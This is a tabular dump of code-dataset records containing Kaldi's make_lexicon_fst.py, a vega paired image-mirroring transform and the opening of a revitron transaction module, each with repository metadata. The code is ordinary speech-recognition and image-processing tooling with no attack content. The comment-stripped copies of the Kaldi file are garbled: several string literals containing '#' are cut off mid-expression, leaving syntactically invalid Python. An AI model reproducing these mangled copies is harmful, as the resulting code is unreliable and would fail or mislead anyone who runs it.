hexsha
stringlengths 40
40
| size
int64 4
996k
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
996k
| avg_line_length
float64 1.33
58.2k
| max_line_length
int64 2
323k
| alphanum_fraction
float64 0
0.97
| content_no_comment
stringlengths 0
946k
| is_comment_constant_removed
bool 2
classes | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
790af2f23140922bac8d9d20a58e89a9cdc76d25
| 19,129
|
py
|
Python
|
egs/wsj/s5/utils/lang/make_lexicon_fst.py
|
shuipi100/kaldi
|
8e30fddb300a87e7c79ef2c0b9c731a8a9fd23f0
|
[
"Apache-2.0"
] | 74
|
2017-01-10T21:27:24.000Z
|
2022-03-05T07:30:30.000Z
|
egs/wsj/s5/utils/lang/make_lexicon_fst.py
|
shuipi100/kaldi
|
8e30fddb300a87e7c79ef2c0b9c731a8a9fd23f0
|
[
"Apache-2.0"
] | 55
|
2020-10-20T02:18:56.000Z
|
2021-07-26T04:52:23.000Z
|
egs/wsj/s5/utils/lang/make_lexicon_fst.py
|
shuipi100/kaldi
|
8e30fddb300a87e7c79ef2c0b9c731a8a9fd23f0
|
[
"Apache-2.0"
] | 28
|
2017-01-23T10:49:04.000Z
|
2022-03-05T07:30:21.000Z
|
#!/usr/bin/env python3
# Copyright 2018 Johns Hopkins University (author: Daniel Povey)
# Apache 2.0.
# see get_args() below for usage message.
import argparse
import os
import sys
import math
import re
# The use of latin-1 encoding does not preclude reading utf-8. latin-1
# encoding means "treat words as sequences of bytes", and it is compatible
# with utf-8 encoding as well as other encodings such as gbk, as long as the
# spaces are also spaces in ascii (which we check). It is basically how we
# emulate the behavior of python before python3.
sys.stdout = open(1, 'w', encoding='latin-1', closefd=False)
sys.stderr = open(2, 'w', encoding='latin-1', closefd=False)
def get_args():
parser = argparse.ArgumentParser(description="""This script creates the
text form of a lexicon FST, to be compiled by fstcompile using the
appropriate symbol tables (phones.txt and words.txt) . It will mostly
be invoked indirectly via utils/prepare_lang.sh. The output goes to
the stdout.""")
parser.add_argument('--sil-phone', dest='sil_phone', type=str,
help="""Text form of optional-silence phone, e.g. 'SIL'. See also
the --silprob option.""")
parser.add_argument('--sil-prob', dest='sil_prob', type=float, default=0.0,
help="""Probability of silence between words (including at the
beginning and end of word sequences). Must be in the range [0.0, 1.0].
This refers to the optional silence inserted by the lexicon; see
the --silphone option.""")
parser.add_argument('--sil-disambig', dest='sil_disambig', type=str,
help="""Disambiguation symbol to disambiguate silence, e.g. #5.
Will only be supplied if you are creating the version of L.fst
with disambiguation symbols, intended for use with cyclic G.fst.
This symbol was introduced to fix a rather obscure source of
nondeterminism of CLG.fst, that has to do with reordering of
disambiguation symbols and phone symbols.""")
parser.add_argument('--left-context-phones', dest='left_context_phones', type=str,
help="""Only relevant if --nonterminals is also supplied; this relates
to grammar decoding (see http://kaldi-asr.org/doc/grammar.html or
src/doc/grammar.dox). Format is a list of left-context phones,
in text form, one per line. E.g. data/lang/phones/left_context_phones.txt""")
parser.add_argument('--nonterminals', type=str,
help="""If supplied, --left-context-phones must also be supplied.
List of user-defined nonterminal symbols such as #nonterm:contact_list,
one per line. E.g. data/local/dict/nonterminals.txt.""")
parser.add_argument('lexiconp', type=str,
help="""Filename of lexicon with pronunciation probabilities
(normally lexiconp.txt), with lines of the form 'word prob p1 p2...',
e.g. 'a 1.0 ay'""")
args = parser.parse_args()
return args
def read_lexiconp(filename):
"""Reads the lexiconp.txt file in 'filename', with lines like 'word pron p1 p2 ...'.
Returns a list of tuples (word, pron_prob, pron), where 'word' is a string,
'pron_prob', a float, is the pronunciation probability (which must be >0.0
and would normally be <=1.0), and 'pron' is a list of strings representing phones.
An element in the returned list might be ('hello', 1.0, ['h', 'eh', 'l', 'ow']).
"""
ans = []
found_empty_prons = False
found_large_pronprobs = False
# See the comment near the top of this file, RE why we use latin-1.
with open(filename, 'r', encoding='latin-1') as f:
whitespace = re.compile("[ \t]+")
for line in f:
a = whitespace.split(line.strip(" \t\r\n"))
if len(a) < 2:
print("{0}: error: found bad line '{1}' in lexicon file {2} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
word = a[0]
if word == "<eps>":
# This would clash with the epsilon symbol normally used in OpenFst.
print("{0}: error: found <eps> as a word in lexicon file "
"{1}".format(line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
try:
pron_prob = float(a[1])
except:
print("{0}: error: found bad line '{1}' in lexicon file {2}, 2nd field "
"should be pron-prob".format(sys.argv[0], line.strip(" \t\r\n"), filename),
file=sys.stderr)
sys.exit(1)
prons = a[2:]
if pron_prob <= 0.0:
print("{0}: error: invalid pron-prob in line '{1}' of lexicon file {1} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
if len(prons) == 0:
found_empty_prons = True
ans.append( (word, pron_prob, prons) )
if pron_prob > 1.0:
found_large_pronprobs = True
if found_empty_prons:
print("{0}: warning: found at least one word with an empty pronunciation "
"in lexicon file {1}.".format(sys.argv[0], filename),
file=sys.stderr)
if found_large_pronprobs:
print("{0}: warning: found at least one word with pron-prob >1.0 "
"in {1}".format(sys.argv[0], filename), file=sys.stderr)
if len(ans) == 0:
print("{0}: error: found no pronunciations in lexicon file {1}".format(
sys.argv[0], filename), file=sys.stderr)
sys.exit(1)
return ans
def write_nonterminal_arcs(start_state, loop_state, next_state,
nonterminals, left_context_phones):
"""This function relates to the grammar-decoding setup, see
kaldi-asr.org/doc/grammar.html. It is called from write_fst_no_silence
and write_fst_silence, and writes to the stdout some extra arcs
in the lexicon FST that relate to nonterminal symbols.
See the section "Special symbols in L.fst,
kaldi-asr.org/doc/grammar.html#grammar_special_l.
start_state: the start-state of L.fst.
loop_state: the state of high out-degree in L.fst where words leave
and enter.
next_state: the number from which this function can start allocating its
own states. the updated value of next_state will be returned.
nonterminals: the user-defined nonterminal symbols as a list of
strings, e.g. ['#nonterm:contact_list', ... ].
left_context_phones: a list of phones that may appear as left-context,
e.g. ['a', 'ah', ... '#nonterm_bos'].
"""
shared_state = next_state
next_state += 1
final_state = next_state
next_state += 1
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=start_state, dest=shared_state,
phone='#nonterm_begin', word='#nonterm_begin',
cost=0.0))
for nonterminal in nonterminals:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=shared_state,
phone=nonterminal, word=nonterminal,
cost=0.0))
# this_cost equals log(len(left_context_phones)) but the expression below
# better captures the meaning. Applying this cost to arcs keeps the FST
# stochatic (sum-to-one, like an HMM), so that if we do weight pushing
# things won't get weird. In the grammar-FST code when we splice things
# together we will cancel out this cost, see the function CombineArcs().
this_cost = -math.log(1.0 / len(left_context_phones))
for left_context_phone in left_context_phones:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=shared_state, dest=loop_state,
phone=left_context_phone, word='<eps>', cost=this_cost))
# arc from loop-state to a final-state with #nonterm_end as ilabel and olabel
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=final_state,
phone='#nonterm_end', word='#nonterm_end', cost=0.0))
print("{state}\t{final_cost}".format(
state=final_state, final_cost=0.0))
return next_state
def write_fst_no_silence(lexicon, nonterminals=None, left_context_phones=None):
"""Writes the text format of L.fst to the standard output. This version is for
when --sil-prob=0.0, meaning there is no optional silence allowed.
'lexicon' is a list of 3-tuples (word, pron-prob, prons) as returned by
read_lexiconp().
'nonterminals', which relates to grammar decoding (see kaldi-asr.org/doc/grammar.html),
is either None, or the user-defined nonterminal symbols as a list of
strings, e.g. ['#nonterm:contact_list', ... ].
'left_context_phones', which also relates to grammar decoding, and must be
supplied if 'nonterminals' is supplied is either None or a list of
phones that may appear as left-context, e.g. ['a', 'ah', ... '#nonterm_bos'].
"""
loop_state = 0
next_state = 1 # the next un-allocated state, will be incremented as we go.
for (word, pronprob, pron) in lexicon:
cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=(cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
start_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_fst_with_silence(lexicon, sil_prob, sil_phone, sil_disambig,
nonterminals=None, left_context_phones=None):
"""Writes the text format of L.fst to the standard output. This version is for
when --sil-prob != 0.0, meaning there is optional silence
'lexicon' is a list of 3-tuples (word, pron-prob, prons)
as returned by read_lexiconp().
'sil_prob', which is expected to be strictly between 0.. and 1.0, is the
probability of silence
'sil_phone' is the silence phone, e.g. "SIL".
'sil_disambig' is either None, or the silence disambiguation symbol, e.g. "#5".
'nonterminals', which relates to grammar decoding (see kaldi-asr.org/doc/grammar.html),
is either None, or the user-defined nonterminal symbols as a list of
strings, e.g. ['#nonterm:contact_list', ... ].
'left_context_phones', which also relates to grammar decoding, and must be
supplied if 'nonterminals' is supplied is either None or a list of
phones that may appear as left-context, e.g. ['a', 'ah', ... '#nonterm_bos'].
"""
assert sil_prob > 0.0 and sil_prob < 1.0
sil_cost = -math.log(sil_prob)
no_sil_cost = -math.log(1.0 - sil_prob);
start_state = 0
loop_state = 1 # words enter and leave from here
sil_state = 2 # words terminate here when followed by silence; this state
# has a silence transition to loop_state.
next_state = 3 # the next un-allocated state, will be incremented as we go.
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=loop_state,
phone='<eps>', word='<eps>', cost=no_sil_cost))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=sil_state,
phone='<eps>', word='<eps>', cost=sil_cost))
if sil_disambig is None:
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=loop_state,
phone=sil_phone, word='<eps>', cost=0.0))
else:
sil_disambig_state = next_state
next_state += 1
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=sil_disambig_state,
phone=sil_phone, word='<eps>', cost=0.0))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_disambig_state, dest=loop_state,
phone=sil_disambig, word='<eps>', cost=0.0))
for (word, pronprob, pron) in lexicon:
pron_cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state, dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(pron_cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=no_sil_cost + (pron_cost if i <= 0 else 0.0)))
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=sil_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=sil_cost + (pron_cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
start_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_words_txt(orig_lines, highest_numbered_symbol, nonterminals, filename):
"""Writes updated words.txt to 'filename'. 'orig_lines' is the original lines
in the words.txt file as a list of strings (without the newlines);
highest_numbered_symbol is the highest numbered symbol in the original
words.txt; nonterminals is a list of strings like '#nonterm:foo'."""
with open(filename, 'w', encoding='latin-1') as f:
for l in orig_lines:
print(l, file=f)
cur_symbol = highest_numbered_symbol + 1
for n in [ '#nonterm_begin', '#nonterm_end' ] + nonterminals:
print("{0} {1}".format(n, cur_symbol), file=f)
cur_symbol = cur_symbol + 1
def read_nonterminals(filename):
"""Reads the user-defined nonterminal symbols in 'filename', checks that
it has the expected format and has no duplicates, and returns the nonterminal
symbols as a list of strings, e.g.
['#nonterm:contact_list', '#nonterm:phone_number', ... ]. """
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no nonterminals symbols.".format(filename))
for nonterm in ans:
if nonterm[:9] != '#nonterm:':
raise RuntimeError("In file '{0}', expected nonterminal symbols to start with '#nonterm:', found '{1}'"
.format(filename, nonterm))
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def read_left_context_phones(filename):
"""Reads, checks, and returns a list of left-context phones, in text form, one
per line. Returns a list of strings, e.g. ['a', 'ah', ..., '#nonterm_bos' ]"""
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no left-context phones.".format(filename))
whitespace = re.compile("[ \t]+")
for s in ans:
if len(whitespace.split(s)) != 1:
raise RuntimeError("The file {0} contains an invalid line '{1}'".format(filename, s) )
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def is_token(s):
"""Returns true if s is a string and is space-free."""
if not isinstance(s, str):
return False
whitespace = re.compile("[ \t\r\n]+")
split_str = whitespace.split(s);
return len(split_str) == 1 and s == split_str[0]
def main():
args = get_args()
lexicon = read_lexiconp(args.lexiconp)
if args.nonterminals is None:
nonterminals, left_context_phones = None, None
else:
if args.left_context_phones is None:
print("{0}: if --nonterminals is specified, --left-context-phones must also "
"be specified".format(sys.argv[0]))
sys.exit(1)
nonterminals = read_nonterminals(args.nonterminals)
left_context_phones = read_left_context_phones(args.left_context_phones)
if args.sil_prob == 0.0:
write_fst_no_silence(lexicon,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
else:
# Do some checking that the options make sense.
if args.sil_prob < 0.0 or args.sil_prob >= 1.0:
print("{0}: invalid value specified --sil-prob={1}".format(
sys.argv[0], args.sil_prob), file=sys.stderr)
sys.exit(1)
if not is_token(args.sil_phone):
print("{0}: you specified --sil-prob={1} but --sil-phone is set "
"to '{2}'".format(sys.argv[0], args.sil_prob, args.sil_phone),
file=sys.stderr)
sys.exit(1)
if args.sil_disambig is not None and not is_token(args.sil_disambig):
print("{0}: invalid value --sil-disambig='{1}' was specified."
"".format(sys.argv[0], args.sil_disambig), file=sys.stderr)
sys.exit(1)
write_fst_with_silence(lexicon, args.sil_prob, args.sil_phone,
args.sil_disambig,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
# (lines, highest_symbol) = read_words_txt(args.input_words_txt)
# nonterminals = read_nonterminals(args.nonterminal_symbols_list)
# write_words_txt(lines, highest_symbol, nonterminals, args.output_words_txt)
if __name__ == '__main__':
main()
| 46.429612
| 115
| 0.603429
|
import argparse
import os
import sys
import math
import re
sys.stdout = open(1, 'w', encoding='latin-1', closefd=False)
sys.stderr = open(2, 'w', encoding='latin-1', closefd=False)
def get_args():
parser = argparse.ArgumentParser(description="""This script creates the
text form of a lexicon FST, to be compiled by fstcompile using the
appropriate symbol tables (phones.txt and words.txt) . It will mostly
be invoked indirectly via utils/prepare_lang.sh. The output goes to
the stdout.""")
parser.add_argument('--sil-phone', dest='sil_phone', type=str,
help="""Text form of optional-silence phone, e.g. 'SIL'. See also
the --silprob option.""")
parser.add_argument('--sil-prob', dest='sil_prob', type=float, default=0.0,
help="""Probability of silence between words (including at the
beginning and end of word sequences). Must be in the range [0.0, 1.0].
This refers to the optional silence inserted by the lexicon; see
the --silphone option.""")
parser.add_argument('--sil-disambig', dest='sil_disambig', type=str,
help="""Disambiguation symbol to disambiguate silence, e.g. #5.
Will only be supplied if you are creating the version of L.fst
with disambiguation symbols, intended for use with cyclic G.fst.
This symbol was introduced to fix a rather obscure source of
nondeterminism of CLG.fst, that has to do with reordering of
disambiguation symbols and phone symbols.""")
parser.add_argument('--left-context-phones', dest='left_context_phones', type=str,
help="""Only relevant if --nonterminals is also supplied; this relates
to grammar decoding (see http://kaldi-asr.org/doc/grammar.html or
src/doc/grammar.dox). Format is a list of left-context phones,
in text form, one per line. E.g. data/lang/phones/left_context_phones.txt""")
parser.add_argument('--nonterminals', type=str,
help="""If supplied, --left-context-phones must also be supplied.
List of user-defined nonterminal symbols such as #nonterm:contact_list,
one per line. E.g. data/local/dict/nonterminals.txt.""")
parser.add_argument('lexiconp', type=str,
help="""Filename of lexicon with pronunciation probabilities
(normally lexiconp.txt), with lines of the form 'word prob p1 p2...',
e.g. 'a 1.0 ay'""")
args = parser.parse_args()
return args
def read_lexiconp(filename):
ans = []
found_empty_prons = False
found_large_pronprobs = False
with open(filename, 'r', encoding='latin-1') as f:
whitespace = re.compile("[ \t]+")
for line in f:
a = whitespace.split(line.strip(" \t\r\n"))
if len(a) < 2:
print("{0}: error: found bad line '{1}' in lexicon file {2} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
word = a[0]
if word == "<eps>":
print("{0}: error: found <eps> as a word in lexicon file "
"{1}".format(line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
try:
pron_prob = float(a[1])
except:
print("{0}: error: found bad line '{1}' in lexicon file {2}, 2nd field "
"should be pron-prob".format(sys.argv[0], line.strip(" \t\r\n"), filename),
file=sys.stderr)
sys.exit(1)
prons = a[2:]
if pron_prob <= 0.0:
print("{0}: error: invalid pron-prob in line '{1}' of lexicon file {1} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
if len(prons) == 0:
found_empty_prons = True
ans.append( (word, pron_prob, prons) )
if pron_prob > 1.0:
found_large_pronprobs = True
if found_empty_prons:
print("{0}: warning: found at least one word with an empty pronunciation "
"in lexicon file {1}.".format(sys.argv[0], filename),
file=sys.stderr)
if found_large_pronprobs:
print("{0}: warning: found at least one word with pron-prob >1.0 "
"in {1}".format(sys.argv[0], filename), file=sys.stderr)
if len(ans) == 0:
print("{0}: error: found no pronunciations in lexicon file {1}".format(
sys.argv[0], filename), file=sys.stderr)
sys.exit(1)
return ans
def write_nonterminal_arcs(start_state, loop_state, next_state,
nonterminals, left_context_phones):
shared_state = next_state
next_state += 1
final_state = next_state
next_state += 1
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=start_state, dest=shared_state,
phone='#nonterm_begin', word='#nonterm_begin',
cost=0.0))
for nonterminal in nonterminals:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=shared_state,
phone=nonterminal, word=nonterminal,
cost=0.0))
# together we will cancel out this cost, see the function CombineArcs().
this_cost = -math.log(1.0 / len(left_context_phones))
for left_context_phone in left_context_phones:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=shared_state, dest=loop_state,
phone=left_context_phone, word='<eps>', cost=this_cost))
# arc from loop-state to a final-state with #nonterm_end as ilabel and olabel
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=final_state,
phone='al_cost}".format(
state=final_state, final_cost=0.0))
return next_state
def write_fst_no_silence(lexicon, nonterminals=None, left_context_phones=None):
loop_state = 0
next_state = 1 # the next un-allocated state, will be incremented as we go.
for (word, pronprob, pron) in lexicon:
cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=(cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
start_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_fst_with_silence(lexicon, sil_prob, sil_phone, sil_disambig,
nonterminals=None, left_context_phones=None):
assert sil_prob > 0.0 and sil_prob < 1.0
sil_cost = -math.log(sil_prob)
no_sil_cost = -math.log(1.0 - sil_prob);
start_state = 0
loop_state = 1 # words enter and leave from here
sil_state = 2 # words terminate here when followed by silence; this state
# has a silence transition to loop_state.
next_state = 3 # the next un-allocated state, will be incremented as we go.
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=loop_state,
phone='<eps>', word='<eps>', cost=no_sil_cost))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=sil_state,
phone='<eps>', word='<eps>', cost=sil_cost))
if sil_disambig is None:
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=loop_state,
phone=sil_phone, word='<eps>', cost=0.0))
else:
sil_disambig_state = next_state
next_state += 1
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=sil_disambig_state,
phone=sil_phone, word='<eps>', cost=0.0))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_disambig_state, dest=loop_state,
phone=sil_disambig, word='<eps>', cost=0.0))
for (word, pronprob, pron) in lexicon:
pron_cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state, dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(pron_cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=no_sil_cost + (pron_cost if i <= 0 else 0.0)))
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=sil_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=sil_cost + (pron_cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
start_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_words_txt(orig_lines, highest_numbered_symbol, nonterminals, filename):
with open(filename, 'w', encoding='latin-1') as f:
for l in orig_lines:
print(l, file=f)
cur_symbol = highest_numbered_symbol + 1
for n in [ 'rmat(n, cur_symbol), file=f)
cur_symbol = cur_symbol + 1
def read_nonterminals(filename):
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no nonterminals symbols.".format(filename))
for nonterm in ans:
if nonterm[:9] != '
raise RuntimeError("In file '{0}', expected nonterminal symbols to start with '#nonterm:', found '{1}'"
.format(filename, nonterm))
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def read_left_context_phones(filename):
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no left-context phones.".format(filename))
whitespace = re.compile("[ \t]+")
for s in ans:
if len(whitespace.split(s)) != 1:
raise RuntimeError("The file {0} contains an invalid line '{1}'".format(filename, s) )
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def is_token(s):
if not isinstance(s, str):
return False
whitespace = re.compile("[ \t\r\n]+")
split_str = whitespace.split(s);
return len(split_str) == 1 and s == split_str[0]
def main():
args = get_args()
lexicon = read_lexiconp(args.lexiconp)
if args.nonterminals is None:
nonterminals, left_context_phones = None, None
else:
if args.left_context_phones is None:
print("{0}: if --nonterminals is specified, --left-context-phones must also "
"be specified".format(sys.argv[0]))
sys.exit(1)
nonterminals = read_nonterminals(args.nonterminals)
left_context_phones = read_left_context_phones(args.left_context_phones)
if args.sil_prob == 0.0:
write_fst_no_silence(lexicon,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
else:
# Do some checking that the options make sense.
if args.sil_prob < 0.0 or args.sil_prob >= 1.0:
print("{0}: invalid value specified --sil-prob={1}".format(
sys.argv[0], args.sil_prob), file=sys.stderr)
sys.exit(1)
if not is_token(args.sil_phone):
print("{0}: you specified --sil-prob={1} but --sil-phone is set "
"to '{2}'".format(sys.argv[0], args.sil_prob, args.sil_phone),
file=sys.stderr)
sys.exit(1)
if args.sil_disambig is not None and not is_token(args.sil_disambig):
print("{0}: invalid value --sil-disambig='{1}' was specified."
"".format(sys.argv[0], args.sil_disambig), file=sys.stderr)
sys.exit(1)
write_fst_with_silence(lexicon, args.sil_prob, args.sil_phone,
args.sil_disambig,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
# (lines, highest_symbol) = read_words_txt(args.input_words_txt)
# nonterminals = read_nonterminals(args.nonterminal_symbols_list)
# write_words_txt(lines, highest_symbol, nonterminals, args.output_words_txt)
if __name__ == '__main__':
main()
| true
| true
|
790af397daafc9c5a23868ff8a12ad7ae0b28ccd
| 1,710
|
py
|
Python
|
vega/datasets/transforms/RandomMirrow_pair.py
|
jie311/vega
|
1bba6100ead802697e691403b951e6652a99ccae
|
[
"MIT"
] | 724
|
2020-06-22T12:05:30.000Z
|
2022-03-31T07:10:54.000Z
|
vega/datasets/transforms/RandomMirrow_pair.py
|
jie311/vega
|
1bba6100ead802697e691403b951e6652a99ccae
|
[
"MIT"
] | 147
|
2020-06-30T13:34:46.000Z
|
2022-03-29T11:30:17.000Z
|
vega/datasets/transforms/RandomMirrow_pair.py
|
jie311/vega
|
1bba6100ead802697e691403b951e6652a99ccae
|
[
"MIT"
] | 160
|
2020-06-29T18:27:58.000Z
|
2022-03-23T08:42:21.000Z
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""This is a class for RandomMirrow_pair."""
import numpy as np
from vega.common import ClassFactory, ClassType
@ClassFactory.register(ClassType.TRANSFORM)
class RandomMirrow_pair(object):
"""Random mirrow two related image."""
def __call__(self, image, label):
"""Call function of RandomMirrow_pair.
:param image: usually the feature image, for example, the LR image for super solution dataset,
the initial image for the segmentation dataset, and etc
:type image: PIL image
:param label: usually the label image, for example, the HR image for super solution dataset,
the mask image for the segmentation dataset, and etc
:type lebel: PIL image
:return: the image after transform
:rtype: list, erery item is a PIL image, the first one is feature image, the second is label image
"""
flip = np.random.choice(2) * 2 - 1
channels_image = image.shape[-1]
channels_label = label.shape[-1]
if channels_image == 3:
image = image[:, :, ::flip]
else:
image = image[:, ::flip]
if channels_label == 3:
label = label[:, :, ::flip]
else:
label = label[:, ::flip]
return image, label
| 38.863636
| 106
| 0.65731
|
import numpy as np
from vega.common import ClassFactory, ClassType
@ClassFactory.register(ClassType.TRANSFORM)
class RandomMirrow_pair(object):
def __call__(self, image, label):
flip = np.random.choice(2) * 2 - 1
channels_image = image.shape[-1]
channels_label = label.shape[-1]
if channels_image == 3:
image = image[:, :, ::flip]
else:
image = image[:, ::flip]
if channels_label == 3:
label = label[:, :, ::flip]
else:
label = label[:, ::flip]
return image, label
| true
| true
|
790af5bb0ce3b02e55df6524c2c36c1ba99bae7f
| 853
|
py
|
Python
|
revitron/transaction.py
|
YKato521/revitron-for-RevitPythonShell
|
031a87997a00902bf16ca9ef6bb05f5cae26e044
|
[
"MIT"
] | null | null | null |
revitron/transaction.py
|
YKato521/revitron-for-RevitPythonShell
|
031a87997a00902bf16ca9ef6bb05f5cae26e044
|
[
"MIT"
] | null | null | null |
revitron/transaction.py
|
YKato521/revitron-for-RevitPythonShell
|
031a87997a00902bf16ca9ef6bb05f5cae26e044
|
[
"MIT"
] | null | null | null |
"""
The ``transaction`` submodule contains a wrapper class to simplify the usage of transactions::
t = revitron.Transaction()
...
